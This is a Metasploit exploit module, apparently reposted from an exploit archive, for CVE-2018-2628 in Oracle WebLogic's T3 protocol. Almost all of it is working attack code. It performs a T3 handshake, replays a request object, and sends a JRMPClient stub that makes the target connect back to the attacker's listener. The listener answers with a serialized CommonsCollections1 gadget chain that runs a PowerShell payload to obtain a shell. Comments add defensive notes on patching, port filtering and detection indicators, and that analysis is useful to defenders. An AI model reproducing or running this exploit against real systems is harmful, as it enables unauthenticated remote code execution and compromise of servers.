Oracle Weblogic Server Deserialization Remote Code Execution Exploit
Security Risk Critical
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
#
# Exploit module for CVE-2018-2628, an unauthenticated deserialization flaw
# reachable over Oracle WebLogic's T3 protocol (RPORT, 7001 by default).
# Sequence as implemented in #exploit below: a T3 handshake, a replayed
# WebLogic request object, then a serialized JRMPClient stub that names this
# module's own TCP server (SRVHOST/SRVPORT). The WebLogic host is expected to
# connect back to that listener and is answered with a serialized gadget chain
# whose command is a PowerShell one-liner for the selected payload.
#
# Defender's view: the only inbound traffic is T3 on RPORT, so exposure is
# bounded by who can reach that port (WebLogic connection filters can restrict
# T3 to trusted hosts) and by the vendor patch for CVE-2018-2628. An outbound
# JRMP connection from the application server to an arbitrary host/port, and
# typically a powershell.exe child of the WebLogic Java process, are the
# observable artifacts of a successful run.

require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Remote
  # Manual rank; the module performs no version check or probe before sending
  # the T3 request object.
  Rank = ManualRanking

  include Msf::Exploit::Remote::Tcp       # client socket to RHOST:RPORT (T3)
  include Msf::Exploit::Remote::TcpServer # listener on SRVHOST:SRVPORT for the callback
  include Msf::Exploit::Powershell        # cmd_psh_payload, used in #gen_resp

  # Module metadata. The single target is Windows because the command run on
  # the server is produced by cmd_psh_payload (see #gen_resp). RPORT defaults
  # to WebLogic's usual T3/admin port.
  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Oracle Weblogic Server Deserialization RCE',
      'Description'    => %q{ An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a serialized object to the interface to execute code on vulnerable hosts. },
      'Author'         => [
        'brianwrf', # EDB PoC
        'Jacob Robles' # Metasploit Module
      ],
      'License'        => MSF_LICENSE,
      'References'     => [
        ['CVE', '2018-2628'],
        ['EDB', '44553']
      ],
      'Privileged'     => false,
      'Targets'        => [
        [ 'Windows', { 'Platform' => ['win'] } ]
      ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => { 'RPORT' => 7001 },
      'DisclosureDate' => 'Apr 17 2018'))
  end

  # Precompute @resp, the JRMP reply handed to the target when it connects
  # back (see #on_client_connect). It is a captured ysoserial JRMPListener
  # response — the note below names the CommonsCollections1 chain — with the
  # original 'calc.exe' argument replaced by the PowerShell one-liner for the
  # selected payload. Decoded, the hex carries the class names of the chain
  # (javax.management.BadAttributeValueExpException as the outer object,
  # sun.reflect.annotation.AnnotationInvocationHandler, LazyMap,
  # ChainedTransformer, ConstantTransformer, InvokerTransformer,
  # java.lang.Runtime with getRuntime/getMethod/invoke/exec) and the ysoserial
  # artifact string "file:/tmp/ss.jar"; those strings are useful markers when
  # hunting for this chain in captures or deserialization-filter logs.
  def gen_resp
    # PowerShell one-liner for the payload. %COMSPEC% is swapped for a literal
    # cmd.exe, presumably because the command is not expanded by a shell.
    pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
    pwrshl.gsub!("%COMSPEC%", "cmd.exe")
    # Hex-encode the command and prefix a 2-byte length (Java UTF layout).
    # to_s(16) is not zero-padded, so alignment only holds while every byte
    # is >= 0x10 — true for the printable one-liner. A command longer than
    # 65535 bytes would not fit the 4-hex-digit length field.
    tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join
    mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0')
    mycmd << tmp_dat

    # Response data taken from JRMPListener generated data:
    # java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 'calc.exe'
    # Modified captured network traffic bytes. Patch in command to run.
    # Leading 0x51 appears to be the JRMP ReturnData marker, followed by the
    # Java serialization magic aced0005.
    @resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e'
    @resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045'
    @resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176'
    @resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863'
    @resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e'
    @resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c'
    @resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573'
    @resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163'
    @resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545'
    @resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400'
    @resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c'
    @resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c'
    @resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163'
    @resp << '6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e'
    @resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669'
    @resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870'
    @resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973'
    @resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361'
    @resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361'
    @resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e'
    @resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e'
    @resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973'
    @resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176'
    @resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543'
    @resp << '6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661'
    @resp << '2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469'
    @resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870'
    @resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374'
    @resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e'
    @resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565'
    @resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61'
    @resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574'
    @resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176'
    @resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c'
    @resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174'
    @resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163'
    @resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d'
    @resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61'
    @resp << '70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366'
    @resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f'
    @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675'
    @resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97'
    @resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061'
    @resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'
    @resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f'
    @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472'
    @resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d'
    @resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d'
    @resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461'
    @resp << '6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73'
    @resp << '74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672'
    @resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078'
    @resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469'
    @resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287'
    @resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67'
    @resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950'
    @resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400'
    @resp << '1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61'
    @resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67'
    @resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab'
    @resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100'
    @resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a'
    @resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270'
    @resp << '7571007e003b00000000740006696e766f6b657571007e003e00000002767200'
    @resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076'
    @resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e'
    @resp << '673badd256e7e91d7b470200007078700000000174'
    # The trailing 0x74 above is a TC_STRING tag; mycmd supplies the 2-byte
    # length and bytes of the command string that replaces the PoC's
    # 'calc.exe'. The next 0x74 + 0004 'exec' is the method name that follows.
    @resp << mycmd
    @resp << '74'
    @resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a'
    @resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661'
    @resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'
    @resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005'
    @resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368'
    @resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61'
    @resp << '76612e6c616e672e4f7665727269646500000000000000000000007078707100'
    @resp << '7e005a'
  end

  # TcpServer callback: runs once per connection the WebLogic host makes to
  # SRVHOST:SRVPORT. Sends a short JRMP acknowledgement and then @resp.
  # @met_sent (reset in #exploit) records peers already served, so a host
  # that reconnects repeatedly receives the serialized response only once.
  def on_client_connect(client)
    # Make sure to only sent one meterpreter payload to a host.
    # During testing the remote host called back up to 11 times
    # (or as long as the server was listening).
    vprint_status("Comparing host: #{client.peerhost}")
    if @met_sent.include?(client.peerhost) then return end
    @met_sent << client.peerhost
    vprint_status("met_sent: #{@met_sent}")

    # Response format determined by watching network traffic
    # generated by EDB PoC.
    # Appears to be a JRMP ProtocolAck (0x4e) followed by the endpoint
    # identifier: the peer host as a length-prefixed UTF string (hence the
    # leading '00' of the 2-byte length) and the peer port as a 4-byte int
    # (hence '0000' before the 2-byte port). Same unpadded to_s(16) caveat
    # as in #gen_resp; it holds for numeric peer addresses.
    accept_conn = '4e00'
    raccept_conn = client.peerhost.each_byte.map {|b| b.to_s(16)}.join
    accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2,'0')
    accept_conn << raccept_conn
    accept_conn << '0000'
    accept_conn << client.peerport.to_s(16).rjust(4,'0')
    client.put([accept_conn].pack('H*'))
    client.put([@resp].pack('H*'))
  end

  # T3 protocol greeting. The hex decodes to the text
  #   "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"
  # i.e. a client announcing protocol version 12.2.1. This is a standard T3
  # client banner, so on its own it indicates T3 use rather than an attack.
  # The server's reply (sock.get_once) is returned but not inspected by the
  # caller.
  def t3_handshake
    shake = '74332031322e322e310a41533a323535'
    shake << '0a484c3a31390a4d533a313030303030'
    shake << '30300a0a'
    sock.put([shake].pack('H*'))
    sleep(1)
    sock.get_once
  end

  # Second T3 message, replayed from the EDB PoC capture. Decoded, the stream
  # carries weblogic.rjvm.ClassTableEntry entries for weblogic.common.internal
  # PackageInfo, VersionInfo and PeerInfo plus a weblogic.rjvm.JVMID. Only
  # RPORT is patched in; the address 192.168.1.227, a WIN-… host name and
  # 242.214.1.254 embedded in the JVMID are left over from the original
  # capture, so they do not identify the sender and are a fingerprint of this
  # PoC lineage. The reply is returned unexamined.
  def build_t3_request_object
    # data block is from EDB PoC
    data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'
    data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'
    data << '700000000a000000030000000000000006007070707070700000000a00000003'
    data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'
    data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'
    data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'
    data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'
    data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'
    data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'
    data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'
    data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'
    data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'
    data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'
    data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'
    data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'
    data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'
    data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'
    data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'
    data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'
    data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'
    data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
    data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'
    data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'
    data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'
    data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'
    data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'
    data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'
    data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
    data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'
    data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'
    data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'
    data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'
    data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'
    data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'
    data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'
    data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'
    data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'
    data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'
    data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'
    data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'
    data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'
    data << '2d4147444d565155423154362e656883348cd6000000070000'
    # Only value patched into this message: the target port as 2 bytes.
    data << rport.to_s(16).rjust(4, '0')
    data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'
    data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'
    data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'
    data << '863d1d0000000078'
    sock.put([data].pack('H*'))
    sleep(2)
    sock.get_once
  end

  # Third T3 message: the JRMPClient2 object from the EDB PoC. Decoded, the
  # serialized portion holds a java.rmi.activation.Activator proxy backed by
  # java.rmi.server.RemoteObjectInvocationHandler / RemoteObject with a
  # UnicastRef whose endpoint is rewritten to SRVHOST:SRVPORT, followed by
  # weblogic.rjvm.ImmutableServiceContext, weblogic.rmi.provider
  # BasicServiceContext and a MethodDescriptor for
  # "authenticate(Lweblogic.security.acl.UserInfo;)". Resolving that remote
  # reference is what is expected to make the server connect back to this
  # module's listener (see #on_client_connect). A RemoteObject/UnicastRef
  # naming an external host inside a T3 request is the pattern to look for
  # in captures of this vulnerability class.
  def send_payload_objdata
    # JRMPClient2 payload generated from EDB PoC:
    # python exploit.py <rhost> <rport> ysoserial-0.0.6-SNAPSHOT-BETA-all.jar <lhost> <lport> JRMPClient2
    # Patch in srvhost and srvport
    payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
    payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
    payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'
    payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'
    payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'
    payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'
    payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'
    payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'
    payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'
    payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'
    payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'
    payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'
    payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'
    payload << '78707702000078fe010000'
    # Data: the serialized Activator proxy / RemoteObjectInvocationHandler.
    payload << 'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e'
    payload << '416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50'
    payload << '726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e67'
    payload << '2f7265666c6563742f496e766f636174696f6e48616e646c65723b7870737200'
    payload << '2d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e76'
    payload << '6f636174696f6e48616e646c657200000000000000020200007872001c6a6176'
    payload << '612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c6133'
    payload << '1e030000787077'
    # UnicastRef endpoint: "UnicastRef", then SRVHOST as a length-prefixed UTF
    # string, then SRVPORT as a 4-byte int, then a fixed tail (presumably the
    # ObjID) ending in the 0x78 block-end marker. Host encoding has the same
    # unpadded to_s(16) assumption as #gen_resp.
    unicast_srvhost = srvhost.each_byte.map { |b| b.to_s(16) }.join
    unicast_dat = '000a556e696361737452656600'
    unicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2,'0')
    unicast_dat << unicast_srvhost
    unicast_dat << '0000'
    unicast_dat << srvport.to_s(16).rjust(4,'0')
    unicast_dat << '000000004e18654b000000000000000000000000000000'
    unicast_dat << '78'
    # One-byte length of the UnicastRef block (the -1 presumably excludes the
    # trailing marker), then the block itself.
    payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2,'0')
    payload << unicast_dat
    payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'
    payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'
    payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'
    payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'
    payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'
    payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'
    payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'
    payload << '6f3b290000001b7878fe00ff'
    # T3 framing: a 4-byte total length (message plus the length field itself)
    # in front of the message. It is written twice, one second apart; the
    # reason for the repeat is not recorded here.
    data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')
    data << payload
    sock.put([data].pack('H*'))
    sleep(1)
    sock.put([data].pack('H*'))
    sleep(1)
    sock.get_once
  end

  # Entry point. Builds @resp before connecting so the listener has it ready,
  # walks the three T3 stages, starts the callback listener between the
  # request object and the JRMPClient message, and then waits. The 10-second
  # sleep is the only synchronisation with the server-initiated callback:
  # the method returns regardless of whether a connection was ever received,
  # and none of the T3 replies collected above are checked.
  def exploit
    @met_sent = []
    gen_resp
    connect
    vprint_status('Sending handshake...')
    t3_handshake
    build_t3_request_object
    start_service
    vprint_status('Sending payload...')
    send_payload_objdata
    # Need to wait this long to make sure we get a shell back
    sleep(10)
  end
end

# 0day.today [2024-11-14] #